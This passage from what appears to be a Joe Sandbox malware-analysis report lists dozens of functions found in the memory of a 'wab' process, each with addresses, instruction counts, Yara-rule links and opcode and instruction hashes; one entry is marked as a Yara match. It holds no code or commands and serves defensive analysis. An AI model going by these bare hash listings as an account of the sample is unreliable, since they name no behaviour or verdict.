                                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                            • Instruction Fuzzy Hash: 03516A726093429FC310CF28C980B5ABBE5FFC8244F08892DF9959B380D734E94ACB56
                                                            Function 036251ED Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00aa752d336a898f88df161cc2dcfbfe6236383fdd691df3a3fea14bc810859f
                                                            • Instruction ID: 669a7ccb28bd72dba1093c33b32ef15cf72aecbea75e2c2914098f0d458b7109
                                                            • Opcode Fuzzy Hash: 00aa752d336a898f88df161cc2dcfbfe6236383fdd691df3a3fea14bc810859f
                                                            • Instruction Fuzzy Hash: 60519235A01B25DFDF31DBA8C940BEDFBB4BB09714F064459DA02EB250E77498418F59
                                                            Function 0365F71F Relevance: .1, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3979143ede96c34ed689dfd2bb0ecd56b2fa6e3aafef460fb0105612cd8e9351
                                                            • Instruction ID: 1156452d7b6648ccdd90a1b2533c7e307473652c6f105763920771da4f035fc8
                                                            • Opcode Fuzzy Hash: 3979143ede96c34ed689dfd2bb0ecd56b2fa6e3aafef460fb0105612cd8e9351
                                                            • Instruction Fuzzy Hash: 76418AB6D00629ABCB11EBA89944AEFB7BCAF09654F15016AFD01EB340D634DD0187E4
                                                            Function 036501F8 Relevance: .1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b519be6578faa4fa5156c2075b088abb50d879d6d9c8a346b325cfd103c5b06
                                                            • Instruction ID: 11b5ef04bdd418f6e28ed057a6dd1bf8e9c48d3a51c85ca1f8dc5ca41d8b3e8b
                                                            • Opcode Fuzzy Hash: 7b519be6578faa4fa5156c2075b088abb50d879d6d9c8a346b325cfd103c5b06
                                                            • Instruction Fuzzy Hash: 09417B3AA0121A9BCB14DFA8C540AEEF7B4BF48710F18816AEC15AB350D735DD41CBA8
                                                            Function 03662750 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                            • Instruction ID: af8128f2fb81de8c726e986afee4f5e80e70fc53ce52e5766123159799ad296e
                                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                            • Instruction Fuzzy Hash: 1D512B75A00615DFDB14CF99C580AADF7FAFF88710F1881AAD815EB350D730A942CB90
                                                            Function 0369D1C0 Relevance: .1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                            • Instruction ID: d6446a4c1c0e7439e1764378aa86950ab33a8ce6856212a07127c11dc50985ed
                                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                            • Instruction Fuzzy Hash: 45512771A04206DFDF18CF68C5816AAFBF5FB48314B18816ED919AB345E334EA81CF94
                                                            Function 03626154 Relevance: .1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4215e7c37fe15b679415c12fe1eb1f844f67c710742f4e592051e08b73d00955
                                                            • Instruction ID: 4f9e8c67c62db4d8965e50389eb54388e96004412067f4a4cf7dd2f0ecbc95f2
                                                            • Opcode Fuzzy Hash: 4215e7c37fe15b679415c12fe1eb1f844f67c710742f4e592051e08b73d00955
                                                            • Instruction Fuzzy Hash: 31514B71901626DFDB25DB28CD10BE8BBB4EF06314F0982E9D4159B3D1D7B89981CF84
                                                            Function 0361B136 Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6709fcab590e3794794d93af787161e764227f07e9afa81a2a1c167c1fcede84
                                                            • Instruction ID: 446448c04b163edaa277ea8b175e7ebcad344f7c40de984bc86e7ec049dc300d
                                                            • Opcode Fuzzy Hash: 6709fcab590e3794794d93af787161e764227f07e9afa81a2a1c167c1fcede84
                                                            • Instruction Fuzzy Hash: 9641ACB5640301EFDB21EF68C950B2AFBA8EF05794F088479EA11DB2A0D774D855CB98
                                                            Function 036E866E Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                            • Instruction ID: 7241ac98e4437f7ca45059c86ed3e10815b05b448d90273ac714bbb27bc2c773
                                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                            • Instruction Fuzzy Hash: 7F418675B11219ABDF15DF99CD94ABFBBBAEF84A00F1840ADE804A7341D670DD09C7A0
                                                            Function 0364D6E0 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15fee1af0601317fa8ccd8cdbc8ac91a1183fc164fcbbacd9f6ed2a224f973fa
                                                            • Instruction ID: b9aa66c01e0d07baf509b2985640a1d26128c1f2c88c47dc597bda64ed198ffe
                                                            • Opcode Fuzzy Hash: 15fee1af0601317fa8ccd8cdbc8ac91a1183fc164fcbbacd9f6ed2a224f973fa
                                                            • Instruction Fuzzy Hash: 0141E7766043009FC724FF69D9A0E6BB7B8EB89760F00466DF9154F291CB38E811CB99
                                                            Function 0361A020 Relevance: .1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                            • Instruction ID: 7bdd996b45ce0a3b9bd6debbb363bde97c19c5bd36e2f39b0f70a851ded83892
                                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                            • Instruction Fuzzy Hash: 13414C31A01311DBDB20DEE5C5407BAF776EB40B5AF9D80AAE8459F344D6398D92CB90
                                                            Function 03650710 Relevance: .1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                            • Instruction ID: a06f84d19132d6c65edcc2ecb2c6c6ad00abee68d9257e3b1d6584cdb041db20
                                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                            • Instruction Fuzzy Hash: B841E575A00605EFDB24CF98C990AAAB7F8FB08704F10497DE996DB650D330EA45CB94
                                                            Function 0362262C Relevance: .1, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf67bfc6995ae258612c0c7570a2b8eb2534060199a9db8144dac12e59a34f6c
                                                            • Instruction ID: cb4f04243bdb755723ac6134f8826c5d801086bc9f49836dc6188e704a410f43
                                                            • Opcode Fuzzy Hash: bf67bfc6995ae258612c0c7570a2b8eb2534060199a9db8144dac12e59a34f6c
                                                            • Instruction Fuzzy Hash: 3641EF76505B14DFCB61EF28CA24B29BBB5FF44310F168AADC8069B3A0DB70A941CF51
                                                            Function 036A07C3 Relevance: .1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40753cec10fe5652c7071091f6ad0ee8b2c88e59ab0e9825b2a4899d14bd06c1
                                                            • Instruction ID: cf4f626de1de1b29736b55707ec4fab09a5015f39f8d24de3ce931869d7b18bd
                                                            • Opcode Fuzzy Hash: 40753cec10fe5652c7071091f6ad0ee8b2c88e59ab0e9825b2a4899d14bd06c1
                                                            • Instruction Fuzzy Hash: D6419F769083009FD760DF28C845B9BBBE8FF88754F008A2EF998D7250D7749905CB96
                                                            Function 036302E1 Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction ID: d8b950cae2c8b58db46ecf8e3e2995c9a7f4807df3ab8321a2aaa1f2411d7f38
                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                            • Instruction Fuzzy Hash: 1E312831A04645AFDB11DB68CC40B9ABFF8BF06750F0845A9E856DB351C674D848CBA5
                                                            Function 03649274 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6464081489f66248fbad70fce68d3c42ebfa3f4c36c52f7e90e5da2eb21f1dd6
                                                            • Instruction ID: eec1b34e98fb46fe4163e66b743cddc8dcf87d88a2574a75449f2b49c5306fcb
                                                            • Opcode Fuzzy Hash: 6464081489f66248fbad70fce68d3c42ebfa3f4c36c52f7e90e5da2eb21f1dd6
                                                            • Instruction Fuzzy Hash: 27318F76E40328AFDB26DB28CC40B9AB7F9AF86350F1401D9A54CAB280DB309D45CB55
                                                            Function 03625702 Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07cf8e31fe8cb8407b055da31344a10342e4792c6b55d848b5114c5b844370df
                                                            • Instruction ID: d41e514e09cb13b2ccaf39409b810f443b6ea158b8af2967e3d70bf034b6af3c
                                                            • Opcode Fuzzy Hash: 07cf8e31fe8cb8407b055da31344a10342e4792c6b55d848b5114c5b844370df
                                                            • Instruction Fuzzy Hash: 7931C035601E16FFCB61EB24CA44AAAFB69BF49304F055569EA0287B50DB70E821CFD0
                                                            Function 03624260 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b817b5ab82959ad766783baea7ce8958ed3db3faa7d35d90da68c231d749cfd
                                                            • Instruction ID: 6602e436c89b089a5f9c783ef27b76c75c716c7a9d60b3777c722c8313842874
                                                            • Opcode Fuzzy Hash: 3b817b5ab82959ad766783baea7ce8958ed3db3faa7d35d90da68c231d749cfd
                                                            • Instruction Fuzzy Hash: 3F41BC35200B05DFC722DF2AC590F96BBE9AB49354F05892DE55A8B360CB74E804CB98
                                                            Function 036450E4 Relevance: .1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                            • Instruction ID: cbfe04bf49802805ffd13bd785bb8158fa133abb2a91406fcc3fdaad743392bb
                                                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                            • Instruction Fuzzy Hash: 5631F731B083419BD721EA18C900767FBE5AB86750F0C856EF6968B381D774C841C792
                                                            Function 00418543 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 673219d99554e60180069c25b8d615590531d51250cb8b042e402690fca02db2
                                                            • Instruction ID: eaecee21d8f301e99a42cb8c9987ea5faa86e2307a91edd9ed31cec3086a1f51
                                                            • Opcode Fuzzy Hash: 673219d99554e60180069c25b8d615590531d51250cb8b042e402690fca02db2
                                                            • Instruction Fuzzy Hash: 96217D362482569BCB26DF34E8911E5BBA5EF8332432C17BDD5C06B182DF25884BD781
                                                            Function 036E61C3 Relevance: .1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a1fd8ece5ecc1425dcc257e35b9cbf4f78c7b2f06a55fc5903845dc9bac5cfc
                                                            • Instruction ID: 2ebfc38485b3e8fd83284de07c6e9ab3372ea09e56faa1f0a0c00270c5ae4acf
                                                            • Opcode Fuzzy Hash: 3a1fd8ece5ecc1425dcc257e35b9cbf4f78c7b2f06a55fc5903845dc9bac5cfc
                                                            • Instruction Fuzzy Hash: 4431E479A01215EFDB15DF98CD40BAEF7B5EB49740F454168E400AB344D774ED05CBA8
                                                            Function 036E60B8 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f500470cc632c06a9f00c787eaaf603d6ecf2e875167045cbff20efe2d459763
                                                            • Instruction ID: 0b5ec4f1c0cc25df724e985aa1ceabe4faa3f7e772b57438c91204f094d7e854
                                                            • Opcode Fuzzy Hash: f500470cc632c06a9f00c787eaaf603d6ecf2e875167045cbff20efe2d459763
                                                            • Instruction Fuzzy Hash: 8A31F17AA01205EFDB12DFADC950BAEBBB9AF45354F0400ADE541EB342DA30DD058B90
                                                            Function 036207AF Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3d19c4b35ce182f19235556e196f6cc29332c61d1c9e6e08bc248d45d45befa
                                                            • Instruction ID: 8c71379abee74999bcc251b48760501383569029d8f075fe7be4481ebe5e0022
                                                            • Opcode Fuzzy Hash: f3d19c4b35ce182f19235556e196f6cc29332c61d1c9e6e08bc248d45d45befa
                                                            • Instruction Fuzzy Hash: 3B31F77AA04B21DBCB12DE248880E6BBFA9AFC5650F07456DFC569B310DA34DC118BD5
                                                            Function 036257C0 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52729f456a3cc304a83fd91baf877ded65b6dc01c2fdf8ebc8ab336212945219
                                                            • Instruction ID: 5329baaca80549ad409f38130e9dcbcec9890b11612a0217b5dd08802eb848fd
                                                            • Opcode Fuzzy Hash: 52729f456a3cc304a83fd91baf877ded65b6dc01c2fdf8ebc8ab336212945219
                                                            • Instruction Fuzzy Hash: DB31CF39611A1AFFDB51EB24DA40AA9BBA6FF49300F145469ED028BB50C774E831CF80
                                                            Function 0365A6C7 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                            • Instruction ID: 65841aec48a1d9c590be400453500847c73641ec4b33b7d6ee7ec5a04b935436
                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                            • Instruction Fuzzy Hash: 5A310D76B00B01AFD765CF69DE45B57B7F8BB08650F18097EA99AC3750E630E900CB64
                                                            Function 0364438F Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f25bb1684453efd065ef3d6f75081fbd39fd01e83db988bd10ebf8881a87f21
                                                            • Instruction ID: 260ace91f3763ea05ae2ea04116a58898de0025f030d2faa61b002ff8270d0b9
                                                            • Opcode Fuzzy Hash: 4f25bb1684453efd065ef3d6f75081fbd39fd01e83db988bd10ebf8881a87f21
                                                            • Instruction Fuzzy Hash: B631D436F003059FCB15EFAAC982B6EB7F9EB84704F108529D505D7254EB34D946CBA0
                                                            Function 036292C5 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                            • Instruction ID: 6531e4a2b40edacf42aba89c7eef80999bad78dbb58d575890147d3b642304dd
                                                            • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                            • Instruction Fuzzy Hash: AC3188B56087198FCB01DF18D94095ABBE9EF89350F050969FC51DB3A0D731DC21CBAA
                                                            Function 03677190 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                            • Instruction ID: a5414eb3c3d112c13d771ca2b87f243a0aaa9b5511fcde8f12f76c5a8d698b79
                                                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                            • Instruction Fuzzy Hash: C4314775605306CFC710CF18C580966FBF5FF89314B6986A9E9589B325E730ED06CB91
                                                            Function 036DC3CD Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction ID: f09f597cb643991b9d5433b09c56299a12453b004d80df42216c7b1b9bb6e63e
                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction Fuzzy Hash: 65212B3EA00759A7CB15EBA58800ABFF7B5EF40710F40801EF9968B691E634D950C774
                                                            Function 0361C156 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 797affc5eebdb1229ca54dc43122979043229f36c1f325c5a96655769620d017
                                                            • Instruction ID: 177d0f1b3752ae099965a30b5bb42cb88bd6da3aa8cf0ec43c99082f2ad1cffc
                                                            • Opcode Fuzzy Hash: 797affc5eebdb1229ca54dc43122979043229f36c1f325c5a96655769620d017
                                                            • Instruction Fuzzy Hash: 6131F9B65003109BCB30EF28CC55BA9B7B4EF41314F9885ADDD859F345DA34E986CBA4
                                                            Function 0361E388 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction ID: bab63f611927137b070e8ac943d1f16fbb58b2799cc92f5b6753708ad936c4c6
                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction Fuzzy Hash: 89316935600644EFD721CB68C984F6AB7B9EF85354F1849A9E952CB390E730EA52CB60
                                                            Function 0369E609 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c2d7058caf69b5eb5c2945922401c6e145a36c5dbe7caee433aa7ae00d3a2059
                                                            • Instruction ID: c91391822081178046639f7d34812012661d3d3f38078a4eda2ae3d276589aad
                                                            • Opcode Fuzzy Hash: c2d7058caf69b5eb5c2945922401c6e145a36c5dbe7caee433aa7ae00d3a2059
                                                            • Instruction Fuzzy Hash: 5A318F76A00205DFDF18CF1CC884DAEB7B9FF88304B15855AE8059B391E732EA61CB94
                                                            Function 03623616 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd663a9f7cdaa71c8d6045c6355f6ead9a4615331cb634789ef06aebe139945b
                                                            • Instruction ID: 2ff55470fef1bd9cff2431a4ab6c5f66802dc194b3fe1b9d5d886a70fd8a77a2
                                                            • Opcode Fuzzy Hash: fd663a9f7cdaa71c8d6045c6355f6ead9a4615331cb634789ef06aebe139945b
                                                            • Instruction Fuzzy Hash: 2721393A205B609FCB61DF08CA54B5ABFA8FF81B10F2A445CE9400B741C774E854CF81
                                                            Function 0364F32A Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
